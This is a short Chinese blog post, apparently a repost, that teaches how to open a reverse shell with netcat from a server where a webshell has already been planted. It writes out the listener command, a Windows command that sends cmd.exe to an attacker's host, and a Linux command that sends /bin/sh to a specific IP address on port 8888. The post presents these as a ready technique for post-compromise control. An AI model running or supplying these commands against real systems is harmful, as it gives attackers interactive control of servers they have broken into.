今日中午有某牛牛问我如何使用NC反弹拿shell当时真是冷汗直冒!哎,郁闷,正好此时有空就写出来供某牛牛和小菜们学习一下!
使用NC反弹Shell
在进行Shell反弹时,有时会碰到服务器不支持PHP或者WebShell无法成功反弹Shell的情况,例如有的服务器只支持JSP,不支持PHP。此时,可以同样采用Windows下的经典的NC反弹Shell方法。
在Windows下反弹CmdShell时,首先要在本机运行"nc -vv -l -p 端口号"监听端口,然后在WebShell中执行"nc -e cmd.exe 监听主机IP地址 端口",就可以反弹一个CmdShell。这个方法在Linux中仍然可行,只不过需要作一点小小的改动。
--在本机监听端口后,在WebShell运行nc反弹时,需要发送的是"/bin/sh",而不是cmd.exe,这样才够反弹发送一个Linux下的Shell命令行窗口给监听主机。例如执行如下命令:
nc 119.1.44.32 8888 -e /bin/sh 即可反弹一个Shell到IP地址为119.1.44.32的监听主机的8888端口。
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/785.html
扫一扫
879
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
